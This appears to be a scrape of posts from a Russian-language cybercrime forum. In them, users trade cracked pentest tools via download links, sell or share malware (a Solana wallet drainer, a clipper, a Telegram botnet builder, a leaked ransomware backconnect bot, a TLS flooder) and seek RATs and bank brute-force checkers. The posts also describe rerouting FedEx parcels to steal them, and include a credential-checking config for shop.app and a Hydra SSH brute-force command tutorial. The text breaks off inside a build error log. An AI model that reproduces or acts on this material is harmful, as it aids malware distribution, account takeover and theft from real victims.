Читая архивы с двача увидел у пользователя скрин с рат'ом.
Заинтересовался его поискам но так и не нашел.
Скрин:
Незнаю актуальность данного скрина но на поисках так и не смог найти
упоминании об этом rat, если кто-то знает отпишите внизу ветки плз.
Наслаждайтесь
Download: <https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.9.231020153-Linux- Pwn3rzs-CyberArsenal.7z>
Password: Pwn3rzs
Сабж, среди основных задач - чек каналов на монетизацию, 2fa и кол-во подписчиков
Всем добра
Такая проблема:
Ставлю NL на дедик ,проходит пару минут и софт закрывается. фаерволл
выкл,папка/процесс в исключение ав.
![www.mdsec.co.uk](/proxy.php?image=https%3A%2F%2Fwww.mdsec.co.uk%2Fwp- content%2Fuploads%2F2021%2F09%2Ffinal-logo-nighthawk-and-gold- gradient-1.png-1.png&hash=cfeed0d589db98c6f68a739854010b89&return_error=1)
What is Nighthawk? Nighthawk is the most advanced and evasive command-and- control framework available on the market. Designed for lawful red team operations, Nighthawk empowers red teams by providing the benefits...
![www.mdsec.co.uk](/proxy.php?image=https%3A%2F%2Fwww.mdsec.co.uk%2Fwp- content%2Fthemes%2Fmdsec%2Fimg%2Ffavicons%2Fandroid- icon-192x192.png&hash=45dd3994e45dca22c723facfacb3c159&return_error=1) www.mdsec.co.uk
free socks5 checker
чекер носков
for any help tg: sonxyz
bot tg: @SonCheckerSocks_bot
помню бот был, найти не могу
возможно крякнутые какие-то есть?
Всем привет!
Есть ли какое-то готовое решение по выгрузке запроса xxx.net в формате
log:pass из множества текстовиков?
Доброго времени! Ищу кряк SQLBOX.
Может у кого то имеется. Буду очень благодарен!!
Доброго времени суток. Подскажите пожалуйста утилиту для удаления дублей.
Например: есть 2 текстовых файла. Скажем, в первом файле есть значение A1, A2.
Во втором файле значения A1, A2 и A3. Необходима утилита определяющая, что A1
и A2 это повторы, а значение "A3" можно отделить и получить отдельным
текстовым файлом, существует ли какое-то решение?
Нужно чтобы у сшела была функция поиска. по тексту. правам итд
с этим отлично справился пас сшел но что то он на php 8 не роботает
уже столько шлака накачал. с github.
или хоть название скажите кто знает
может есть форки паса. кто то допилюет его я не нашел
Приветствую. Возможно не в тему, но я все же спрошу.
Есть текстовой файл 1 и текстовой файл 2
В файле 1 - реко айпи и логинов из rdp
Spoiler: скрин
В файле 2 - реко таких же ip как в 1 файле, но только вместо логинов домены.
Spoiler: скрин2
Есть ли утилита какая то, чтоб она искала ИП с доменом и ИП с логинами одинаковые и добавляла этот домен к логинам?
Доброго времяни суток, ищу данный софт для тестов
https://github.com/kyleavery/TitanLdr
Может у кого остались сорцы?
Как узнать номер телефона который привязан к странице ВК? "Глаз Бога" находит либо неверный номер либо старый номер на который регестрировали страницу
ищю движок шопа сс может быть сс2бтс или бинго какой то
может кто из вас помнит святой ферум ?
ну что то в этом роде короче
заранее спасибо всем
Code:Copy to clipboard
[Project Settings]
ProjectName=ShopPay @Cash_Out_Gang1337
[Request Settings]
Domain=shop.app
ResponseValide=content="{"email":"
Header5=
Header4=
Header3=
Header2=
Header1=
AddHeader5=False
AddHeader4=False
AddHeader3=False
AddHeader2=False
AddHeader1=False
X-Requested-With=False XMLHttpRequest
Referer=False
ContentType=True application/x-www-form-urlencoded
Accept=True */*
UserAgent=True Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Body=
URL=https://shop.app/pay/account
Method=GET
[Parser Settings]
ParsURL=https://shop.app/pay/account
ParsBefore=nickname"
ParsAfter=content="{"email":"
UseParser=True
MethodParser=One
UseURL=True
Save as proj
Предположим есть некий %Username% и он не хочет работать по модели RaaS.
Интересует софт для шифрования файлов легетимными средствами.
Что-то такое, на что не будет алертов AV.
Любые идеи приветствуются.
Builder World Wind Pro
INFORMATION
[+] Tool : Builder WorldWind Pro
[+] You need to create a Telegram bot
[+] How to use?
[+] When you open it .. you will build your botnet virus . It require 2 things :
[+] BOT API TOKEN :
[+] Go to @Botfather and create a telegram bot and then put the api in the first box
[+] Chat ID : get your chat id from @get_id_bot and paste it in the 2nd box
[+] Then go to your telegram bot that you created it and start it -build your virus and spread it and you will get your result on your bot
[+] Language : C#
[+] Version : v0.1
[+] Made ln : Algeria
[+] Download Link : https://www.mediafire.com/file/yrqfbnnam3fqhua/Builder_WorldWind_Pro.zip/file
Ищу I LOVE YOU.TXT.VBS
I authored this inadequate clipper a while back it supports multiple wallets, persistence via registry & task scheduler, mutex and drop to specified directories. Best practice is to build via garble, thought i should share.
Code:Copy to clipboard
https://www.pcrisk.com/removal-guides/27148-atlas-clipper
https://cyble.com/blog/multiple-new-clipper-malware-variants-discovered-in-the-wild/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/AtlasClipper.SK!MTB
https://www.enigmasoftware.com/atlasclipper-removal/
https://www.cyclonis.com/remove-atlas-clipper/
New Fedex Package Snatcher!
Become
a virtual Porch Pirate!
and
start collecting your booty!
Did you know that with Fedex's website, you can VERY easily re-route packages? ... Well did you know you could with out even having account access??
That's what i thought.... With this easy to use GUI and script, You can now sniff out Packages that are in current delivery status and re-route them to your drop address!!
So..... Hows it work? Well that is a simple concept. The software generates Tracking ID numbers based on a numerical pattern and then cross references those numbers for Tracking IDs like this example link:
Any packages that are still listed as "In-Transit", you can click on the provided URL and goto "Manage Package". From here, all left to do is plunder!
Какие альтернативы Maltego вы знаите ?
What alternatives to Maltego do you know?
There has been a scammer running around and stealing my configs for BL Tools and Cookie Bullet, But I Figured I would help it out
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/ZKkTCC4D#HCVZxohRFTK01wCZrQeW3S7G0ewtBBJwERG-k1J_eVQ)
mega.nz
Кряк
Acunetix Premium v14.2.210505179 Full Activated под вин
Проверен на виртуалке вин 10,работает отлично
Просьба к сообществу-посмотреть,есть ли клей
Download Acunetix_Premium_v14.2.210505179_Full_Activated_pass_1.rar
пароль 1
Программа для автоматического решения простых капч
Присутствует патч, убирающий появления демо-окна при работе с программой.
You must have at least 1 reaction(s) to view the content.
бэкдора нет... ну либо я не нашел
You must have at least 5 reaction(s) to view the content.
Ищу человека со свежим матом, отработаем материал, чекаем через софт, процент 70/30
Есть у кого-то скрипт для создания небольшого словаря пассов из уже
существующих паролей? Видел когдато давно похожии софт для переделок
маил:пасс, использовался чтобы увеличить валид.
Нужно чтобы готовые пароли чутка менялись по популярны сценариям, по типу:
password --> password!
password --> password@
password --> Password
password --> PASSWORD
password --> Passwrd123
и.т.д
Нужен hvnc, который будет удобен для работы с командой из 5 человек. Пробовал pure, venom, но не заходят они
Софт чекер для банков USA (банки в ЛС)
Куплю либо готовый софт (чекер), либо закажу персональный. Оплата достойная
100% (договоримся с каждым)
Софт нужен не медленный , чтобы находил login: password: balance
Софт может быть написан хоть на чем
COФT ДОЛЖен быть без привязок
Заказывать/покупать буду только через гаранта с холдом в 1 сутки, для проверки работоспособности софта.
Софт обязательно должен быть с парсом инфы
Оплачиваю только в ВТС
Желающих продать или написать с нуля прошу писать в личку или telegram @Reciver103
Всем привет, попались в руки исходные коды HVNC, нужен человек с Visual Studio, чтобы скомплировать код Интересно посмотреть. Controller, server, client.
NoBot - софт который чистит пк от ратников, майнеров, кейлоггеров, стиллеров,
левых reg - файлов.
Для более глубокой очистки необходимо выбрать FULL SCAN - а так же, в
настройках выставить все галочки.
Версия NoBot 1.0.4.8
Глубокое сканирование занимает не мало времени...
После завершения сканирования в логах SCAN - отметить файлы для удаления, а
затем - Clean Selected.
**Обязательно перезагрузить ПК.
**
Spoiler: VT
https://www.virustotal.com/gui/file/054f28cc0410503c6dada7462500bee0ca7704233420654fb2b60e1446227615
Hidden content for authorized users.
https://drive.google.com/file/d/1UHrk82CF1-s0veHsy3TQmqiukOMGKcOs/view?usp=sharing
возможна коррекция, смена шаблона, залил демо
Hidden content for authorized users.
скачать
You must have at least 1 reaction(s) to view the content.
Hi all
I am selling a new drainer that steals solana instantly (works on any sol wallet)
Full source code will be sold, and it can be configured as you wish.
I will also give you an entire page to start spamming
Price : 3k$
Pm on telegram for demo or if you have any questions : @therealpika69
Hello folks
i want share cypher source code for free
im not sure its clean or real.. i found on internet
im not a good on c# . but you can test and post reply
thanks
**DOWNLOAD
PLEASE LEAVE A LIKE .**
AIO VM CRYPTO CHECKER DIFFERENT MODULES AVAILABLE. STARTING AT $1K / MODULE
OVER 20 MODULES AVAILABLE: SEE PICTURES BELOW
OVER 6K CPM
USER FRIENDLY INTERFACE
SYSTEM FOR GROUPS OR FRIENDS WANTING TO RESELL SERVICE WITH A TIME AND
SUBSCRIPTION SYSTEM (INCLUDED)
FULL SOURCE CODE WILL BE PROVIDED UPON PURCHASE
Telegram: @OneTimePinCode
ищу кто продает сабку на ба троян пишите в лс
via Token or Shellcode injection ](https://github.com/S3cur3Th1sSh1t/SharpImpersonation)
A User Impersonation tool - via Token or Shellcode injection - S3cur3Th1sSh1t/SharpImpersonation
github.com
Посоветуйте тулзу под линукс, для поиска файлов внутри сети по маскам, с использованием кредсов и жрущим айпилисты
Здравствуйте уважаемые и почтенные жители сего форума. Азм есть недостойный хотел бы посоветоваться с вами как с умными людьми. Нужен ратник для pc кто что может предложить?
ReadyAPI - это **инструмент тестирования API, созданный для комплексной
проверки REST, SOAP, GraphQL, микросервисов и других серверных служб
ReadyAPI-x64-3.3.0.exe -
**virustotal
**loadui.key -
**virustotal
Protection-4.6-jdk12.jar
-virustotal
secure.key -
virustotal
servicev.key -
virustotal
soapui.key -
virustotal
Hidden content for authorized users.
](https://anonfiles.com/Sem383g3zc/ReadyApi_rar)
anonfiles.com
пароль - местный
Software License : Premium Edition
Version : 24.3.240411164
Filename : Acunetix Premium v24.3.240411164 Full Activated.zip
Size : 296.8 MB
https://www.up-4ever.net/zcsot5qdx0nn
доброго времени суток. в поисках толкового кодера, имеющего опыт в написании
брут-чекеров ба, платежных средств и т.д.
на данный момент интересует софт следущих направлений: 1. брут\брут-чекер ба
сша; 2. брут\брут-чекер пп сша аккаунтов; 3. автоматизация взаимодействий с
программой антидетект-браузером определенного типа по заданному сценарию;
Просьба обращаться только компетентных в этом вопросе людей, имеющих как
минимум портфолио.
Работаем исключительно через известных гарантов. Никак иначе.
Имеются профили других кардинг-форумов с репутацией.
Первый контакт - личные сообщения форума.
Может кто подскажет, или поделится чекером запросов в protonmail почтах?
Burp Suite Professional v2022.2.2 + Crack
Released: 03 March 2022
VirusTotal Result:
__
](https://www.virustotal.com/gui/file/eff78eac488a812f3bed5b3121bfccbabc9c245844fbd1c58a672b47acba28e6)
VirusTotal
www.virustotal.com
](https://anonfiles.com/jdV5Q1Lax0/burpsuite_pro_v2022.2.2_zip)
anonfiles.com
Hidden content for authorized users.
Кряк не мой, ответственности не несу, запускать строго не на своем ПК
Работоспособность проверена, функционал выполняет, вроде ничего не сшивает
(всё равно use at own risk)
Скачать: https://anonfiles.com/42ycb4S0y8/Themida_zip
VT:
https://www.virustotal.com/gui/file/88705904205a9a1f1d2ea1335e4ad58c5e5fb664ceebebe46a307f7f7d3a111c
Полезные библиотеки Python
Symbiote - весьма интересный Python модуль для сталкеров. Позволяет генерировать ссылку, при клике на которую вы получите не только IP адрес и дополнительную информацию о хосте, но и возможность получать скриншоты с основной и фронтальной камеры,
Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
cameras📸 can be accessed by sending a link🔗. ](https://github.com/hasanfirnas/symbiote)
Your target's phone's front and back cameras📸 can be accessed by sending a link🔗. - GitHub - hasanfirnas/symbiote: Your target's phone's front and back cameras📸 can be accessed by s...
github.com
Кто работает в данном направлении, приглашаю к сотрудничеству.
Нужно создать видео где на картинку наложен текст. Продолжительностью примерно минуту. Подскажите в какой проге это можно реализовать.
VMProtect 3.5.1 source code with intel.cc and processor.cc
Code:Copy to clipboard
Building VMProtect project
POSIX:
$ ./build.sh
Windows:
> build.bat
PS: Not leaked by me; I am just sharing <3
DOWNLOAD LINK:
Hidden content for authorized users.
](https://github.com/jmpoep/vmprotect-3.5.1)
Contribute to jmpoep/vmprotect-3.5.1 development by creating an account on GitHub.
github.com
OR File attached
Был чекер с гитхаба, после длительного перерыва перестал функционировать. Есть у кого актуальные чекеры smpt, желательно фри на винду ну и также платные версии рассмотрю
На zennoclub стартовал 3-й конкурс кейсов.
Рекомендую почитать мою статью:
Купи немного дешёвых .TON, или легальный киберсквоттинг в TELEGRAM.
](https://zenno.club/discussion/threads/kupi-nemnogo-deshjovyx-ton-ili- legalnyj-kiberskvotting-v-telegram.124486/)
Приветствую всех. Общеизвестно, что количество активных пользователей Telegram уверенно приближается к миллиарду, и это на сегодня самая перспективная и быстро развивающаяся платформа для бизнеса с низким порогом для входа. Пару лет назад они открыли на базе своего сервиса FRAGMENT продажу...
zenno.club
Там же вы можете забрать бесплатный шаблон к статье.
Друзья, подскажите софт для массовой заливки файла на популярные шеллы, под
нужными правами.
Буду признателен за помощь, что-то из готового нечего не нашёл.
Точнее проблема с запуском burploader.jar (кейген). Кейген запускается чисто с
серым экраном.
Запускаю через Java SE JDK 18, на свежем арче.
Как это можно исправить?
UPD:
проблема исправлена. связана с оконным менеджером, исправляется так:
Code:Copy to clipboard
_JAVA_AWT_WM_NONREPARENTING=1 java -jar <filename.jar>
Софт: ( СКАЧАТЬ )
VirusTotal: ( VirusTotal
)
Made this earlier.... Dont know if anyone will find it useful... but here is a free config for BAS
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
gLY0eEydDlvuEy0yLDh86tNLu_fF65MSfAjROM)
mega.nz
Дело в том, что привык использоавть Notion.so(конечно же в браузере, так как
нет клиента под Linux)
Но напрягает то, что нужно держать коннект с миром....
В поисках подобной софтины, которая позволяет форматировать текст(заголовки
там и всё такое, впринципе они все умеют это делать)
а так же чтобы можно было выделять код(вообще бомба если понимает синтаксис
разных ЯП)
вставлять картинки
и чтобы без конекта к интернету.....
Кто чем пользуется, устал уже совты под линукс тестировать.
Ищу софт
Нужны чекеры Viber/WhatSapp/Telegram
Рассмотрю любые варианты ( платные, кряки, бесплатные) и тд
Cracked version BurpBountyPro 2.3 + Profiles
You must have at least 10 reaction(s) to view the content.
You must have at least 10 reaction(s) to view the content.
You must have at least 10 reaction(s) to view the content.
Продам хороший перехватчик айди для будущих продаж.
Xray vulnerability scanner 1.9.1.
Cracked for windows !)
На склейки не проверял , пользуйтесь на виртуалках))
Скачать <
Hello XSS,
I was scammed by the pieces of shit zer0daylab who run the telegram and web site. They sell fake releases on their shop and if someone could assist me in identifying them and causing them some problems please message me.
Anyway I paid for impact 21.2 (the stupidity of my error can be a subject of debate separately) and they provided a fake 21.1 version instead. However, the crack appears to be working for that old version. So if you run it in a VM you are golden, and as far as I know there is no public crack for this yet. Given that these guys are pieces of shit it is possible it is backdoored but I ran it in a VM and saw no issues. Virtustotal complains but it could be because it is packed. Anyway the value is that for people who don't have a crack already this works fine in a VM. I am posting in hope that it causes discomfort for zer0daylab scammers but also to share for a Merry Christmas!
](https://anonfiles.com/r7JfQdT5w6/coreimpact_21.1_crack_7z)
anonfiles.com
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/hA2Lyk)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
oh btw also here is this 3rd party exe i don't see it public anywhere but it's just harmless 3rd party stuff you could get but core bundles it for impact users benefit.
party_exe)
anonfiles.com
deep fuck you to zer0daylab who scammed me and ripped me off. I would never leak private code or something entrusted to me but these cunts ripped me so I hope they don't like this being shared.
BTW I have no idea if there will be a problem with me posting in English here
u menya kali, i kak bi ya ne proboval u menya vihodyat oshibki raznih sortov, ya proboval cherez .deb, apti t.d.
TLS-flooder using HTTP2 connection. Need for down big backends. Can bypass AKAMAI | GOOGLE and other protections. Dont have any backdoors, you can check source code.
For using, you can ask me in telegram - Arivite [t.me/Arivite]
Download - https://gofile.io/d/Gmfv56
VirusTotal - youk
hello xss members,
I just found a lot of malware on Github, and i want to share this with you.
The list is long, maybe there is something on it, that you can use:
Asmodeus
Stealer (Source code)
CookiesConverter
(Netscape to JSON cookies converter)
Cryptocurrency-
Stealer (Steals wallets)
DcRat
(Source code)
Warzone
Cracked (Warzone Rat cracked)
WH-
Rat
Mars
Stealer
Azroult
Stealer
Loki
and Oski Stealer
Anubis
Stealer
Agent-
Tesla Stealer
Trick
Virus (decoded)
BlueEagleJRat
(source code)
Redline
Stealer
HackBrowserData
Neko
Stealer
BlackNet
(v3.7)
RAT
Decoders (Decode RATs)
byPass_AV
(Antivirus Bypass Techniques, PDF)
Always test on a vm machine first!
good luck with the list!
malware list Gitgub
Selling Tiktok Scraper (Username:followers:likes:creation date) can scraper costum region and costum amount of followers! code coming with source code on python language PRICE : 30$
Also i have Tiktok Captcha Solver
If you interested dm in tg: @kingsman_contact_bot or @kingsmanadmin
Видео к программе: https://radikal.ru/video/0Z2xcQGPU6d
Программа для замены паролей в базе Email:Password на логин до @. Принимает как строки вида Email:Password так и просто Email. Полезный софт будет для пользователей кто работает с брут, чекером . Давайте рассмотрим на примере:
База до
База после
Spoiler: Пример в картинках: База до и после обработки
Как работать с программой
Spoiler: Что в архиве
You must have at least 50 reaction(s) to view the content.
Продам скрипт бота продажника, есть способы пополнения. через btc, реф система, логи о покупках, invite. кнопка, скрыть/ закрыть при рассылке, писать можно много чего. Цена 200$
Форумчане, возникла потребность в тех самых слитых сорцах сорцах 10 винды. Может остались у кого то они или знает где достать? Майкрософт снесли все подчистую.
More info.
I recieved the source code from the guy with nickname KD, he is my long time
friend, he works as a programmer.
Some time ago he said that he is angry because
FASTPRISONER recruited him to "private ransomware team
RADAR"
(btw, this group cant be found anywhere on the Internet, so private they are.) (i dont care if its confidential/secret for you Cat, you pissed me off.)
which was nothing more than wasting other people time to check acceses which
were already pentested, and in which FASTPRISONER cannot
move forward, 100% useless.
KD said to me he is gonna take revange for f*cking with him for so long, his
time, he provided me the backconnect bot, and the exploit file. We then would
share 50/50 off sell price
That's the story how i got everything.
For sure im not that banned guy, i dont even remember his nickname, sorry.
FASTPRISONER i provided you full source code of x86_64
arch, to make things clear with you, but as I can see you are so damn blind
angry that you lie about who am I.
So to make you more Meow Meow, here's your backconnect bot, free for everyone.
Meow Meow
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
Secure, fast and free cloud storage solution. Upload and share files instantly.
gofile.io
Короче мой флудер не доделанный ибо его ликнул один из девов поэтому это вам
go mod init go.mod
go mod tidy
go build file.go
Доброго времени! Ищу кряк NLbrute.
Может у кого то имеется. Буду очень благодарен!!
Раньше находил где то, но потерял, буду благодарен если скинете
Приветствую администрацию форума и пользователей.
Предыстория, увидел недавно статью на форме(рекламы не будет) статью о том что
инструмент Brute Ratel С4 был взломан и выложен в открытый доступ. Я нашел его
кому интересно приложу архив ниже.
ВАЖНО!!! Запускать и компилить что либо строго на ваш страх и риск.
!!!Как автор этой статьи я не несу за вас никакой ответственности!!!
](https://usersdrive.com/np0465r13b7n.html)
Download File bruteratel Scandinavian Defense tar
usersdrive.com
Мне жаль, что этот урок на английском, а не на русском языке. Я создал его, но
не знаю русского. нет русской копии для публикации.
I'm sorry this tutorial is in english and not in Russian. I created it but i
don't know Russian. there is no Russian copy to post.
Here is my brute force with Hydra 101 tutorial.
Hope you guys it enjoy.
Spoiler: commands
Code:Copy to clipboard
$ sudo apt install hydra
Code:Copy to clipboard
$ sudo hydra -h
Code:Copy to clipboard
$ sudo hydra -l admin -p 12345 127.0.0.1 ssh
Code:Copy to clipboard
root
admin
user
Molly
steve
richard
Code:Copy to clipboard
$ sudo hydra -L /home/your-user/Documents/usernames.txt -p 12345 127.0.0.1 ssh
Code:Copy to clipboard
$ sudo hydra -L /home/your-user/Documents/usernames.txt -P/Usr/share/wordlist/rockyou.txt 127.0.0.1 ssh
Code:Copy to clipboard
$ sudo hydra -l <username> -p <password> <ip> <service> -o <file.txt>
Code:Copy to clipboard
$ sudo hydra -l ?username> -p ?password> ssh://127.0.0.1
Code:Copy to clipboard
$ sudo hydra -R
Code:Copy to clipboard
$ hydra -l <username> -p <password>> <ip> <service> -s <port>
Code:Copy to clipboard
$ hydra -l <username> -p ,password> -M <path_to_hostnames.txt> service
If you think ive missed the important anything let my know and I will fix it asap.
В общем - пытаюсь уже, наверное, второй час армитаж поставить, но чета не але.
Пытался уже все, что можно, но все равно не билдится тул.
Неотрицаю, что я дегрод, поэтому покажу логи, которые он выдает при попытке
забилдить
Spoiler: ыыыы
bash package.sh && ./gradlew assemble --info
+ ./gradlew assemble
FAILURE: Build failed with an exception.
Where:
Settings file '/root/armitage/settings.gradle'
What went wrong:
Could not compile settings file '/root/armitage/settings.gradle'.
startup failed:
General error during semantic analysis: Unsupported class file major version 61
java.lang.IllegalArgumentException: Unsupported class file major version 61
at groovyjarjarasm.asm.ClassReader.
at groovyjarjarasm.asm.ClassReader.
at groovyjarjarasm.asm.ClassReader.
at groovyjarjarasm.asm.ClassReader.
at
org.codehaus.groovy.ast.decompiled.AsmDecompiler.parseClass(AsmDecompiler.java:81)
at
org.codehaus.groovy.control.ClassNodeResolver.findDecompiled(ClassNodeResolver.java:251)
at
org.codehaus.groovy.control.ClassNodeResolver.tryAsLoaderClassOrScript(ClassNodeResolver.java:189)
at
org.codehaus.groovy.control.ClassNodeResolver.findClassNode(ClassNodeResolver.java:169)
at
org.codehaus.groovy.control.ClassNodeResolver.resolveName(ClassNodeResolver.java:125)
at
org.codehaus.groovy.ast.decompiled.AsmReferenceResolver.resolveClassNullable(AsmReferenceResolver.java:57)
at
org.codehaus.groovy.ast.decompiled.AsmReferenceResolver.resolveClass(AsmReferenceResolver.java:44)
at
org.codehaus.groovy.ast.decompiled.AsmReferenceResolver.resolveNonArrayType(AsmReferenceResolver.java:79)
at
org.codehaus.groovy.ast.decompiled.AsmReferenceResolver.resolveType(AsmReferenceResolver.java:70)
at
org.codehaus.groovy.ast.decompiled.MemberSignatureParser.createMethodNode(MemberSignatureParser.java:57)
at
org.codehaus.groovy.ast.decompiled.DecompiledClassNode$2.get(DecompiledClassNode.java:234)
at
org.codehaus.groovy.ast.decompiled.DecompiledClassNode$2.get(DecompiledClassNode.java:231)
at
org.codehaus.groovy.ast.decompiled.DecompiledClassNode.createMethodNode(DecompiledClassNode.java:242)
at
org.codehaus.groovy.ast.decompiled.DecompiledClassNode.lazyInitMembers(DecompiledClassNode.java:199)
at
org.codehaus.groovy.ast.decompiled.DecompiledClassNode.getDeclaredMethods(DecompiledClassNode.java:122)
at org.codehaus.groovy.ast.ClassNode.getMethods(ClassNode.java:912)
at
org.codehaus.groovy.ast.ClassNode.tryFindPossibleMethod(ClassNode.java:1280)
at
org.codehaus.groovy.control.StaticImportVisitor.transformMethodCallExpression(StaticImportVisitor.java:252)
at
org.codehaus.groovy.control.StaticImportVisitor.transform(StaticImportVisitor.java:113)
at
org.codehaus.groovy.ast.ClassCodeExpressionTransformer.visitExpressionStatement(ClassCodeExpressionTransformer.java:142)
at
org.codehaus.groovy.ast.stmt.ExpressionStatement.visit(ExpressionStatement.java:40)
at
org.codehaus.groovy.ast.ClassCodeVisitorSupport.visitClassCodeContainer(ClassCodeVisitorSupport.java:110)
at
org.codehaus.groovy.ast.ClassCodeVisitorSupport.visitConstructorOrMethod(ClassCodeVisitorSupport.java:121)
at
org.codehaus.groovy.ast.ClassCodeExpressionTransformer.visitConstructorOrMethod(ClassCodeExpressionTransformer.java:53)
at
org.codehaus.groovy.control.StaticImportVisitor.visitConstructorOrMethod(StaticImportVisitor.java:89)
at
org.codehaus.groovy.ast.ClassCodeVisitorSupport.visitConstructor(ClassCodeVisitorSupport.java:128)
at org.codehaus.groovy.ast.ClassNode.visitContents(ClassNode.java:1099)
at
org.codehaus.groovy.ast.ClassCodeVisitorSupport.visitClass(ClassCodeVisitorSupport.java:54)
at
org.codehaus.groovy.control.StaticImportVisitor.visitClass(StaticImportVisitor.java:83)
at
org.codehaus.groovy.control.CompilationUnit$14.call(CompilationUnit.java:708)
at
org.codehaus.groovy.control.CompilationUnit.applyToPrimaryClassNodes(CompilationUnit.java:1084)
at
org.codehaus.groovy.control.CompilationUnit.doPhaseOperation(CompilationUnit.java:640)
at
org.codehaus.groovy.control.CompilationUnit.processPhaseOperations(CompilationUnit.java:618)
at
org.codehaus.groovy.control.CompilationUnit.compile(CompilationUnit.java:595)
at groovy.lang.GroovyClassLoader.doParseClass(GroovyClassLoader.java:401)
at groovy.lang.GroovyClassLoader.access$300(GroovyClassLoader.java:89)
at groovy.lang.GroovyClassLoader$5.provide(GroovyClassLoader.java:341)
at groovy.lang.GroovyClassLoader$5.provide(GroovyClassLoader.java:338)
at
org.codehaus.groovy.runtime.memoize.ConcurrentCommonCache.getAndPut(ConcurrentCommonCache.java:147)
at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:336)
at
org.gradle.groovy.scripts.internal.DefaultScriptCompilationHandler.compileScript(DefaultScriptCompilationHandler.java:139)
at
org.gradle.groovy.scripts.internal.DefaultScriptCompilationHandler.compileToDir(DefaultScriptCompilationHandler.java:95)
at
org.gradle.groovy.scripts.internal.BuildOperationBackedScriptCompilationHandler$2.run(BuildOperationBackedScriptCompilationHandler.java:54)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:29)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:26)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:75)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:153)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.run(DefaultBuildOperationRunner.java:56)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.lambda$run$1(DefaultBuildOperationExecutor.java:71)
at
org.gradle.internal.operations.UnmanagedBuildOperationWrapper.runWithUnmanagedSupport(UnmanagedBuildOperationWrapper.java:45)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:71)
at
org.gradle.groovy.scripts.internal.BuildOperationBackedScriptCompilationHandler.compileToDir(BuildOperationBackedScriptCompilationHandler.java:51)
at
org.gradle.groovy.scripts.internal.FileCacheBackedScriptClassCompiler$CompileToCrossBuildCacheAction.execute(FileCacheBackedScriptClassCompiler.java:190)
at
org.gradle.groovy.scripts.internal.FileCacheBackedScriptClassCompiler$CompileToCrossBuildCacheAction.execute(FileCacheBackedScriptClassCompiler.java:170)
at
org.gradle.groovy.scripts.internal.FileCacheBackedScriptClassCompiler$ProgressReportingInitializer.execute(FileCacheBackedScriptClassCompiler.java:211)
at
org.gradle.groovy.scripts.internal.FileCacheBackedScriptClassCompiler$ProgressReportingInitializer.execute(FileCacheBackedScriptClassCompiler.java:194)
at
org.gradle.cache.internal.DefaultPersistentDirectoryCache$Initializer.initialize(DefaultPersistentDirectoryCache.java:100)
at
org.gradle.cache.internal.FixedSharedModeCrossProcessCacheAccess$1.run(FixedSharedModeCrossProcessCacheAccess.java:86)
at
org.gradle.cache.internal.DefaultFileLockManager$DefaultFileLock.doWriteAction(DefaultFileLockManager.java:215)
at
org.gradle.cache.internal.DefaultFileLockManager$DefaultFileLock.writeFile(DefaultFileLockManager.java:205)
at
org.gradle.cache.internal.FixedSharedModeCrossProcessCacheAccess.open(FixedSharedModeCrossProcessCacheAccess.java:83)
at
org.gradle.cache.internal.DefaultCacheAccess.open(DefaultCacheAccess.java:139)
at
org.gradle.cache.internal.DefaultPersistentDirectoryStore.open(DefaultPersistentDirectoryStore.java:89)
at
org.gradle.cache.internal.DefaultPersistentDirectoryStore.open(DefaultPersistentDirectoryStore.java:43)
at
org.gradle.cache.internal.DefaultCacheFactory.doOpen(DefaultCacheFactory.java:103)
at
org.gradle.cache.internal.DefaultCacheFactory.open(DefaultCacheFactory.java:68)
at
org.gradle.cache.internal.DefaultCacheRepository$PersistentCacheBuilder.open(DefaultCacheRepository.java:126)
at
org.gradle.groovy.scripts.internal.FileCacheBackedScriptClassCompiler.compile(FileCacheBackedScriptClassCompiler.java:116)
at
org.gradle.groovy.scripts.internal.CrossBuildInMemoryCachingScriptClassCache.getOrCompile(CrossBuildInMemoryCachingScriptClassCache.java:50)
at
org.gradle.groovy.scripts.internal.BuildScopeInMemoryCachingScriptClassCompiler.compile(BuildScopeInMemoryCachingScriptClassCompiler.java:50)
at
org.gradle.groovy.scripts.DefaultScriptCompilerFactory$ScriptCompilerImpl.compile(DefaultScriptCompilerFactory.java:49)
at
org.gradle.configuration.DefaultScriptPluginFactory$ScriptPluginImpl.apply(DefaultScriptPluginFactory.java:125)
at
org.gradle.configuration.BuildOperationScriptPlugin$1.run(BuildOperationScriptPlugin.java:65)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:29)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:26)
at
